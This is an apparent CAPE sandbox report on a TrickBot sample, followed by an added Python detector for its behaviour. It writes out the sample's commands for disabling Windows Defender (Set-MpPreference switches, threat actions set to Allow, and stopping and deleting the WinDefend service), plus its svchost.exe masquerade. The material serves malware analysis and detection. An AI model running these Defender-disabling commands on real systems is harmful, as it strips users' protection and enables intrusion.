DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: RPCRT4.dll/UuidFromStringW
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/StartServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
A process created a hidden window
Process: exlxo5YyAuKqn.exe -> C:\ProgramData\ропрУВаЫсенорх.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
A scripting utility was executed
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
command: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
command: cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
command: cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true
command: powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: powershell Set-MpPreference -DisableIOAVProtection $true
command: powershell Set-MpPreference -DisablePrivacyMode $true
command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: powershell Set-MpPreference -SevereThreatDefaultAction 6
command: powershell Set-MpPreference -LowThreatDefaultAction 6
command: powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: powershell Set-MpPreference -DisableScriptScanning $true
Uses Windows utilities for basic functionality
command: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
command: cmd.exe /c sc stop WinDefend
command: cmd.exe /c sc stop WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
command: cmd.exe /c sc delete WinDefend
command: cmd.exe /c sc delete WinDefend
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
command: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
command: cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
command: cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true
command: sc stop WinDefend
command: sc delete WinDefend
Attempts to stop active services
servicename: WinDefend
Spoofs its process name and/or associated pathname to appear as a legitimate process
original_path: C:\Windows\system32\svchost.exe
original_name: svchost.exe
modified_name: svchost.exe
modified_path: C:\ProgramData\ропрУВаЫсенорх.exe
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
CAPE detected the TrickBot malware family
Creates a copy of itself
copy: C:\ProgramData\ропрУВаЫсенорх.exe
Attempts to disable Windows Defender
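The ten Set-MpPreference calls and the two sc commands listed above are the sample's entire Defender-tampering routine, which makes them a compact test corpus for a detection rule. What follows is an added example, not code from the CAPE report or from the sample: a Python detector that scores process-creation command lines (the kind recorded in Sysmon event 1 or Security event 4688) for this behaviour, and a second check for a binary that presents itself as svchost.exe while running from C:\ProgramData under a non-ASCII file name. The event list is constructed from the distinct command lines in this report plus three benign look-alikes; the ATT&CK labels (T1562.001, T1489, T1036.005) are the editor's mapping. Two points worth knowing when reading the signatures: a ThreatDefaultAction value of 6 means Allow, so the three *ThreatDefaultAction commands turn detections of every severity into no-ops; and all of these changes require local administrator rights, while on current Windows builds Tamper Protection rejects these Set-MpPreference changes and the WinDefend service refuses stop/delete even from an elevated prompt, so "Attempts to disable Windows Defender" records an attempt, not a confirmed outcome.

```python
"""Detector for the Windows Defender tampering seen in this TrickBot run.

Added example, not code from the CAPE report or from the sample.  Scores
process-creation command lines and checks a binary that claims a System32
name from another directory.  ATT&CK ids are the editor's mapping.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Set-MpPreference *ThreatDefaultAction values: 1 Clean, 2 Quarantine,
# 3 Remove, 6 Allow, 8 UserDefined, 9 NoAction, 10 Block.  6 and 9 make a
# detection a no-op; the sample sets 6 for Low, Moderate and Severe.
DISARMING_THREAT_ACTIONS = {"6", "9"}

# Switches that weaken Defender when set to $true (the ones this sample uses;
# extend with care so the rule does not fire on routine admin tuning).
DEFENDER_DISABLE_SWITCHES = {
    "disablerealtimemonitoring",
    "disablebehaviormonitoring",
    "disableblockatfirstseen",
    "disableioavprotection",
    "disableintrusionpreventionsystem",
    "disablescriptscanning",
    "disableprivacymode",
}

MPPREF_RE = re.compile(
    r"set-mppreference\s+-(?P<param>[a-z]+)\s+(?P<value>\$?[a-z0-9]+)",
    re.IGNORECASE,
)
SC_WINDEFEND_RE = re.compile(
    r"\bsc(?:\.exe)?\s+(?P<verb>stop|delete|config)\s+windefend\b",
    re.IGNORECASE,
)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM32_RESIDENT = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique id (editor's mapping)
    detail: str
    evidence: str


def analyze_command(cmd: str) -> list[Finding]:
    """Return one Finding per Defender-tampering construct in a command line."""
    findings: list[Finding] = []
    for m in MPPREF_RE.finditer(cmd):
        param, value = m.group("param"), m.group("value").lower()
        if param.lower() in DEFENDER_DISABLE_SWITCHES and value == "$true":
            findings.append(Finding("T1562.001", f"{param} set to $true", cmd))
        elif param.lower().endswith("threatdefaultaction") and value in DISARMING_THREAT_ACTIONS:
            findings.append(Finding("T1562.001", f"{param} set to {value} (Allow/NoAction)", cmd))
    for m in SC_WINDEFEND_RE.finditer(cmd):
        findings.append(Finding("T1489", f"sc {m.group('verb').lower()} WinDefend", cmd))
    return findings


def scan_commands(commands: list[str]) -> list[Finding]:
    """Run analyze_command over a batch of command lines."""
    return [f for cmd in commands for f in analyze_command(cmd)]


def check_masquerade(claimed_name: str, image_path: str) -> list[Finding]:
    """Flag a process that claims a System32 binary's name from elsewhere, or
    whose file name uses non-ASCII characters (as the ProgramData copy does)."""
    findings: list[Finding] = []
    basename = image_path.rsplit("\\", 1)[-1]
    if claimed_name.lower() in SYSTEM32_RESIDENT and not image_path.lower().startswith(SYSTEM_DIRS):
        findings.append(Finding("T1036.005", f"claims {claimed_name} outside a system directory", image_path))
    if not basename.isascii():
        findings.append(Finding("T1036", "non-ASCII executable name", image_path))
    return findings


# Constructed sample: the distinct command lines from this report, plus three
# benign look-alikes that the rule must not fire on.
SAMPLE_COMMANDS = [
    "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
    "cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true",
    "cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true",
    "cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true",
    "cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true",
    "cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true",
    "cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6",
    "cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6",
    "cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6",
    "cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true",
    "cmd.exe /c sc stop WinDefend",
    "cmd.exe /c sc delete WinDefend",
    "powershell Get-MpPreference",                                        # read-only query
    "cmd.exe /c sc query WinDefend",                                      # status check
    "powershell Set-MpPreference -DisableRealtimeMonitoring $false",      # re-enabling
]

if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMANDS):
        print(f.technique, f.detail)
    for f in check_masquerade("svchost.exe", "C:\\ProgramData\\ропрУВаЫсенорх.exe"):
        print(f.technique, f.detail)
```

Run against the constructed list the script reports twelve findings (ten T1562.001, two T1489) and nothing for the three benign lines; the masquerade check on the ProgramData copy yields both a location mismatch and a non-ASCII-name hit. The regexes deliberately key on the cmdlet and switch names rather than on cmd.exe or powershell.exe paths, because the report shows the same command reaching the monitor in three forms (quoted full path, bare cmd.exe, and the inner powershell line).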

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe
C:\ProgramData\ропрУВаЫсенорх.exe
\??\MountPointManager
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Crypto
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001\f58155b4b1d5a524ca0261c3ee99fb50_fb20aa52-1ec9-4d1f-b923-f6709499e604
C:\Users\user\AppData\Local\Temp
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp\sc.*
C:\Users\user\AppData\Local\Temp\sc
C:\Windows\sysnative\sc.*
C:\Windows\sysnative\sc.COM
C:\Windows\sysnative\sc.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\powershell.*
C:\Users\user\AppData\Local\Temp\powershell
C:\Windows\sysnative\powershell.*
C:\Windows\sysnative\powershell
C:\Windows\powershell.*
C:\Windows\powershell
C:\Windows\sysnative\wbem\powershell.*
C:\Windows\sysnative\wbem\powershell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.*
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.COM
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\sysnative\en-US\sc.exe.mui
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\DosDevices\pipe\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\sysnative\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\sysnative\windowspowershell
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_64\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\assembly\GAC_64\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
